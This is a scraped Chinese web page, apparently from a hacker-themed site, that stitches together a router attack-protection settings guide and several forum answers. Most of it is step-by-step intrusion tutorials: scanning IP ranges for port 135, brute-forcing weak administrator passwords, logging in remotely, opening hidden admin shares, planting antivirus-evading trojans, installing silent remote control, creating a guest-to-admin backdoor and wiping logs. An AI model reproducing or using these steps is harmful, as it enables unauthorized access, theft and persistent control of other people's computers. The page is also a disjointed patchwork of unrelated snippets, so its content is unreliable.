国外端口扫描_外网端口扫描工具

hacker|
243

路由器攻击防护功能怎么设置

互联网的发展越来越快, *** 也已经几乎普及到了我们每个家庭,路由器设备是我们最常使用来连接 *** 的工具,那么你知道路由器攻击防护功能怎么设置吗?下面是我整理的一些关于路由器攻击防护功能设置的相关资料,供你参考。

路由器攻击防护功能设置的 ***

在 *** 使用的过程中,往往会遇到各种各样的 *** 攻击,如:扫描类的攻击,DoS攻击等。

我司企业级路有器内置了目前常见的 *** 攻击防护 措施 ,支持内/外部攻击防范,提供扫描类攻击、DoS类攻击、可疑包和含有IP选项的包等攻击保护,能侦测及阻挡IP 地址欺骗、源路由攻击、IP/端口扫描、DoS等 *** 攻击,有效防止Nimda攻击等。(路由器只是对于 *** 中常见的攻击进行防护,对于 *** 的操作进行监控,而病毒,木马等这些处于应用层的应用,我司路由器并不是杀毒软件,并不是我在路由器上设置了防火墙或攻击防护等,您的计算机就不会中病毒)

在开启攻击防护时,必须开启路由器“防火墙总开关”,选中对应的“开启攻击防护”:

在菜单中的“安全设置”-“攻击防护”中,可以看到路由器针对各种 *** 攻击的防护及设置;

其中分别针对各种常见的 *** 攻击进行防护:正确设置各种防护的阈值,可以有效的对各种攻击进行防护。请根据您的 *** 环境进行相应的设置,一般可以使用路由器默认的值,或者可以自己进行设置。在设置的时候,阈值不要设置过小,会导致拦截过高,有可能把 *** 中正常的数据包误认为非法的数据包,使您的 *** 不能正常使用;阈值也不要设置过大,这样会起不到攻击防护的效果。

在区域的设置中,可以选择LAN和WAN,若选择LAN表示对来自局域网的数据包进行监控;而选择WAN表示对来自外网的数据包进行监控。

1、扫描类的攻击防护主要有三类:IP扫描,端口扫描,IP欺骗。

其中WAN区域没有IP欺骗设置。扫描一般都是发起攻击的之一个步骤,攻击者可以利用IP扫描和端口扫描来获取目标 *** 的主机信息和目标主机的端口开放情况,然后对某主机或者某主机的某端口发起攻击,对扫描进行预先的判断并保护可以有效的防止攻击。我司企业级路由器对扫描类攻击的判断依据是:设置一个时间阈值(微秒级),若在规定的时间间隔内某种数据包的数量超过了10个,即认定为进行了一次扫描,在接下来的两秒时间里拒绝来自同一源的这种扫描数据包。阈值的设置一般建议尽可能的大,更大值为一秒,也就是1000000微妙,一般推荐0.5-1秒之间设置。(阈值越大,防火墙对扫描越“敏感”)

下面为路由器没有开启攻击防护下,使用端口扫描工具进行扫描的结果

开启了路由器的“攻击防护”

此时进行端口扫描的结果为

通过抓包分析,路由器检测到了有端口扫描攻击,进行了相应的攻击防护,扫描工具没有接收到前端计算机返回的信息,所以在端口扫描的时候,无法完成端口扫描。此时。路由器发送了一个系统日志给日志服务器,检测到有攻击的存在。

在开启了防火墙的攻击防护后,扫描软件扫描不正确。但路由器每次的扫描判断允许十个扫描数据包通过,因此有可能目的计算机开放的端口刚好在被允许的十个数据包之中,也能被扫描到,但这种几率是微乎其微的。

日志服务器上记录显示有端口扫描攻击

关于日志服务器的使用,请参考《日志服务器的安装与使用》,日志中很清晰的记录了内网电脑192.168.1.100有端口扫描的行为。

2、DoS类的攻击主要有:ICMP Flood、UDP Flood、SYN Flood、Land Attack、WinNuke。

拒绝服务(DoS--Denial of Service)攻击的目的是用极其大量的虚拟信息流耗尽目标主机的资源,目标主机被迫全力处理虚假信息流,从而影响对正常信息流的处理。如果攻击来自多个源地址,则称为分布式拒绝服务DDoS。

企业级路由器对DoS类攻击的判断依据为:设置一个阈值(单位为每秒数据包个数PPS=Packet Per Second),如果在规定的时间间隔内(1秒),某种数据包超过了设置的阈值,即认定为发生了一次洪泛攻击,那么在接下来2秒的时间内,忽略掉下来自相同攻击源的这一类型数据包。

这里“DoS类攻击防护”阈值设置与上面“扫描攻击”阈值刚好相反,值越小越“敏感”,但一般也不能太小,正常的应用不能影响,我们可以根据自己的环境在实际的应用中动态调整。

下面为一个ICMP的例子,在路由器没有开启攻击防护的情况下,ping前端的计算机

使用发包工具,对前端的计算机进行1000pps的ping操作,通过抓包可以看到,前端的计算机都有回应。

而开启了路由器攻击防护的ICMP Flood攻击防护,设置阈值为100pps。

此时进行抓包分析

路由器检测到了有ICMP Flood攻击存在,发送了一个日志给日志服务器,在以后的ping请求中,都没有得到回应。有效地防止了ICMP Flood攻击。

日志服务器中,也可以查看到相应的攻击信息

3、可疑包类防护包括五类:大的ICMP包(大于1024字节)、没有Flag的TCP包、同时设置SYN和FIN的TCP包、仅设置 FIN 而没有设置ACK的TCP包、未知协议。

4、含有IP选项的包防护:在 Internet Protocol 协议(RFC 791)中,指定了一组选项以提供特殊路由控制、诊断工具和安全性。

它是在 IP 包头中的目的地址之后。协议认为这些选项“ 对最常用的通信是不必要的”。在实际使用中,它们也很少出现在 IP 包头中。这些选项经常被用于某些恶意用途。

IP选项包括。

选中一项IP选项的复选框,则检查;清除选项的选择,则取消检查。

一般情况下上面两部分的数据包是不会出现的,属于非正常的包,可能是病毒或者攻击者的试探,路由器在设置了相应的攻击防护的话会将对应的数据包丢弃。

本文主要介绍了企业级路由器的攻击防护的处理机制以及效果,通过举了几个例子进行详细地描述。例子中使用的参数只为测试使用,并不一定符合实际的使用环境,在具体的使用过程中,还需要根据您的实际 *** 使用环境进行调试,找到一个合理的阈值,才能有效的保护您的 *** 。

路由器攻击防护功能设置的相关 文章 :

1. 路由器如何防止ARP病毒攻击

2. 路由器攻击如何防护

3. 怎样使用路由器防止DoS攻击

4. 路由器怎么防止被攻击

1.到路由处,将路由器复位,清空用户名和密码

2.更改路由的用户名密码.

3.关闭路由器的DHCP服务,静态分配IP地址.

PS:注意检查"安全设置---远端WEB管理"中的"远端WEB管理IP地址",注意设为0.0.0.0,防止别人通过外网进入路由器管理界面.

然后你可以使用端口扫描工具,检查非法数据包的来源IP,根据静态分配的IP地址,就可以查出是谁在捣乱了.

或者更狠点,使用路由器自带的防火墙,只开启必要的端口,将多余端口全部关闭.

135端口问题

135端口入侵

(电信拨号上网用户,外网,系统WIN XP,此 *** 可能不适合内网或其他系统)

135端口扫描工具: X-way2.5 (可用其他IP扫描工具) 下载地址

IP整理工具 : 黑色旋风IP(可用其他IP整理工具) 下载地址

弱口令筛选工具 : ntscan10 汉化版 下载地址

远程登录工具 : recton 下载地址

声明:(下载以上文件杀软会报毒,使用后果自负)

运行X-way.exe打开主界面,左边工具栏选主机搜索,中间弹出窗填要扫描的起始IP地址,如自己的上网IP地址为58.54.144.20,可填起始地址为58.54.0.20,结束地址为58.54.255.20。(注意结束地址比起始地址大)。自己的上网IP可在hao123.com主页下部实用查询里的IP地址页看到。注意机器重启后上网IP会发生改变。

搜索方式选端口方式(默认),线程设置里线程数可改为50-1000任选(根据机器性能)。

这里说明一下,WIN XP 默认连接数为10,需先进行线程破解,网上工具很多,实在不行下载迅雷,迅雷软件界面顶端工具栏展开后选系统优化工具,修改连接数更大支持1024,重启后生效。

X-way主机搜索界面,线程设置下面点击高级设置,弹出主机搜索各参数设置窗口,端口设置里勾选other,端口139(默认)改为135,连接延时改为2秒,其他不变,关闭回到主机搜索界面。点击开始,扫描完毕后(也可中途停止),在下面主机列表框内右键点击,保存为 135.txt。建议保存到桌面,文件135.txt打开后样式如下:

58.54.1.65 端口:135开放

58.54.1.78 端口:135开放

58.54.1.85 端口:135开放

58.54.1.34 端口:135开放

58.54.1.109 端口:135开放

58.54.1.116 端口:135开放

58.54.1.135 端口:135开放

58.54.1.25 端口:135开放

58.54.1.146 端口:135开放

58.54.1.95 端口:135开放

58.54.1.123 端口:135开放

58.54.1.154 端口:135开放

运行黑色旋风IP程序进行IP整理(手动整理也可),将弹出RaScal记事本,清空记事本内全部内容,再将135.txt内的全部内容复制到RaScal记事本,关闭RaScal记事本,将询问是否保存,点击“是”。回到黑色旋风IP整理工具,在窗口内点击一下(激活窗口),然后回车进行IP整理。稍等,整理完必的纯净IP文件,默认保存在黑色旋风IP安装目录下的RaScal文件里,打开后样式如下:(注意不要有其他内容或空格,绝对纯净)

58.50.1.101

58.50.2.238

58.50.5.3

58.50.7.112

58.50.13.87

58.50.15.233

58.50.20.22

58.50.20.28

58.50.20.66

58.50.20.69

58.50.20.107

打开ntscan10汉化版,可先用汉化补丁进行汉化处理(注意补丁安装路径应选择ntscan10安装目录),完毕后运行NTscan程序打开主界面,清空开始和结束IP,勾选主机文件,后面打开找到存放纯净IP的文件RaScal,线程数50-500任选(默认50),连接共享选admin$(默认),扫描选项勾选WMI扫描,扫描主机打开的端口改为135,其他不变。点击开始,NTscan程序将进行弱口令筛选。

顺便提一下,NTscan10程序的弱口令文件在其安装目录下的NT_pass文件和NT_user文件里,NT_pass里是弱口令密码,NT_user里是常用弱口令用户,可用写字板打开编辑,进行弱口令增减,如可增加弱口令密码112233,666666,147258369等等,好的密码字典能增加入侵的成功率。注意弱口令密码或弱口令用户越多,扫描的时间也越长。扫描的结果样式如下(若扫得到弱口令主机):

58.50.20.66 administrator 123

58.50.20.107 administrator 空

58.50.2.238 administrator 123456

58.50.20.69 administrator 321

下一步使用远程登录工具recton V2.5进行登录,运行Recton程序打开界面,在界面顶端选Telnet(第二个),远程主机处填扫到的弱口令主机IP地址,如 58.50.20.66,用户名填IP对应的用户,一般为Administrator不动,填用户密码如 123。

然后点击开始执行。不一会将显示正在连接 58.50.20.66...设置为手动...开启服务成功...等等。如长时间无反应或查询服务状态长时间无响应,也许是 *** 问题,可关闭recton再打开重新连接,或登录失败选择其他弱口令主机登录。(注意查看服务是否为开启状态)

服务启动成功后Recton界面顶端有进程和服务,选择后在主窗口右键控制菜单点击右键可获得相关信息(如杀毒软件进程,正在玩的游戏,启动了哪些服务等等),右键点击可打开或关闭对方机器的进程和服务(杀毒软件进程或服务一般有保护,强行关闭可能导致recton断线退出)。Recton界面顶端可选择CMD命令,DOS命令语句在CMD命令栏输入(右边附加设置下,不是在下面)。

Recton界面顶端选择种植者可种植木马,种植木马前先点击获取共享目录,如对方无共享目录则可能导致recton 退出,更好获取共享目录前先Telnet到对方的电脑,开启对方的默认共享。

点击“开始-运行”,输入cmd,回车,在命令提示符模式下,输入telnet 58.50.20.66(以本IP用户为例),注意空格,回车,就会出现telnet登录界面,如果对方的操作系统是Windows XP,就会提示“您将要把您的密码信息送到Internet区内的一台远程计算机上,这可能不安全。您还要送吗(y/n):”。选择y后回车,不然会退出连接。然后会提示让你输入对方的用户名,我们输入administrator后回车,又提示让你输入密码,输入密码123后回车(空密码可直接回车),注意,输入密码时是看不见的,不要理会。稍等,就能进入对方的电脑,还是以管理员身份。这样一来,入侵就成功了。输入以下命令,打开对方的默认共享,也可不用全部执行。

net share c$=c: 回车

net share d$=d: 回车

net share ipc$ 回车

net share admin$回车

比如输入net share c$=c: 回车后会看到共享C盘成功,其他类似。最后输入net share 回车后可查看对方所有开启的共享。入侵成功后可以运行dos命令,更好不要太过份(别干格盘的傻事)。你可以执行dos命令直接上传你的木马文件,还可下载你感兴趣的东东(说难听点就是剽窃),还可创建新的管理员账户,等等等等。总之自由发挥啦!!!

回到Recton种植者界面,点击获取共享目录,在界面右侧可看到对方的共享目录,选择你想要上传木马的对方共享目录,一般默认C盘不动,种植者方式选IPC上传(默认),再点击本地文件,找到你要上传木马的路径,开始种植。下面黑色显示框内会提示文件复制成功,并倒计时开始运行木马文件,不一会,你可在你的木马控制端看到肉鸡上线,如果种植者界面黑色显示框内提示异常错误,则可能你上传的木马在执行时被对方杀软或防火墙阻止,建议将你的木马文件做一下免杀,或直接下载一个免杀的木马文件再上传。

求问局域网电脑入侵的问题

先申明:

1.入侵的范围只包括局域网,如果在学校上,可以入侵整个校园网;

2.能入侵的只是存在弱口令(用户名为administrator等,密码为空),并且开了***端口,但没开防火墙的机子。

入侵工具:

一般要用到三个:NTscan**扫描器,Recton--D贺免杀专用版,DameWare迷你中文版 4.5. (前两个工具杀毒软件都会报毒,建议将杀毒软件实时防毒暂时关掉,并将这两个软件的压缩包加密,防止被杀。)

入侵步骤:

1.使用"NTscan**扫描器",在IP处填上要扫描的IP范围,选择"WMI扫描"方式,按"开始"后就等扫描结果了。

2.使用"Recton--D贺免杀专用版"

选择"CMD命令"项,在"CMD:"中输入"net share C$=C:\",即可开启远程主机的C盘共享,以此将"C"换成D,E,F等,即可开启D盘,E盘,F盘等的共享,这种共享方式隐蔽性很高,而且是完全共享,在对方主机上不会出现一只手托住盘的共享标志,然后在地址栏中输入"\\对方IP\C$",即可进入对方C盘。

选择"Telnet"项,在"远程主机"中输入刚才扫描到的一个IP,远程启动Telnet服务,成功后在"CMD选项"中,执行命令:"net share ipc$",接着执行:"net share admin$",最后执行"net use \\***.***.***.***\IPC$" /user:administrator"在*处填入你入侵的主机IP。

3.使用"DameWare迷你中文版 4.5",安装后点"DameWare Mini Remote Control",在"帮助"项中选择激活产品,输入注册信息,成功注册后,进入"远程连接"窗口,在"主机"处填入IP地址,点"设置",在"服务安装选项"中点"编辑"后,在"通知对话框"中去掉"连接时通知",在"附加设置"中全都不选,在"用户选项"中去掉"启用用户选项菜单"。设置完成好后,就可点"连接",在弹出的对话框中点"确定"后,成功后你就可以像操作自己机子一样控制别人电脑了,当然你也可以只选择监视对方屏幕。注意:如果不注册的话,在对方主机上会弹出一个对话框,暴露你的身份。

入侵步骤补充:

1.在以上第2步中,远程启动Telnet服务可以通过"我的电脑-管理-连接到另一台计算机-输入IP-服务和应用程序-服务-将telnet改为手动-启动"完成。

2.Recton-D贺免杀专用版还有其他功能,在"进程"项中,可以查看远程主机的进程,并可任意结束其中进程;在"共享"项中,可以创建共享,我常用的是创建C$,D$,E$,F$,共享路径分别对应C:\,D:\等,共享好后在地址栏中输入\\IP\C$,进入对方C盘,你就可以随意复制删除里面的东西了,而且这种共享对方机子盘符上不会显示共享图标,也就不会被发现,弄完后更好还是把共享给关掉。最后选"日志",清除所有日志,不留痕迹。这个软件会被杀毒软件当作病毒杀掉,用它时须将实时防毒关掉。

3.上面的共享可通过CMD(程序-附件-命令提示符)完成,首先"telnet IP",telnet上去,键入y后输入的用户名"administrator",密码为空, 进入后,开共享用net share命令,共享C$(即C盘):"net share C$=C:",共享system文件夹:"net share c=c:\winnt\system32",共享IPC$用:"net share IPC$"等,最后是关闭共享,关闭C盘共享:"net share C$ /del"。

4.为方便下次入侵,可以设置后门, 查看用户:"net user",激活guest用户

"net user guest /active:yes",更改guest的密码为poco:"net user guest poco",把guest的权限提升为管理员权限:"net localgroup administrators guest /add"。

5.telnet命令(DOS命令)很多,可去网上查找它的命令,常用的有:查看D盘文件:""dir d:\",查看C盘program file文件夹:"dir c:\PROGRA~1\;",60秒倒记时关机:"shutdown -s -t 60"

补充说明:

1.net use错误原因解决:

(1)."发生系统错误 ***6。 登录失败: 未知的用户名或错误密码。"

在远程机的"控制面板-文件夹选项-查看-简单的文件共享",去掉选取,然后再尝试连接。简单文件共享会把 *** 连接权限都归为 guest连接,是无法访问C$等管理共享的.

(2)"发生系统错误 ***7。登陆失败:用户帐户**。可能的原因包括不允许空密码,登陆时间**,或强制的策略限。"在远程机的"控制面板-管理工具-本地安全策略-安全选项-用户权限"指派里,禁用"空密码用户只能进行控制台登陆".

(3)"//IP/c$"时提示找不到 *** 途径。在" *** 和拨号连接"中"本地连接"中选取"Internet协议(TCP/IP)"属性,进入"高级TCP/IP设置"选"WINS设置"里面有一项"启用TCP/IP的NETBIOS".

一台电脑用局域网连接外网,另外一台用交换机如何一起联网?

把你的其中一台电脑作为服务器使用可行,但是,必须保证主机随时在线,才能包能另外一个能上网,主机不在的时候就得手动修改ip了。

算了吧,还是不要尝试了,直接挂路由吧。

还有种 *** 就是使用端口扫描工具扫描大局域网内的主机的ip和Mac,使用ip切换器,当他不在线的时候就你嘻嘻哈哈咯、

内网端口扫描工具

内网其实和外网一样的,,端口扫描工具有很多

比较出名的就是x--scan,,,

下载地址是 很出名的黑客网站,,

0条大神的评论

发表评论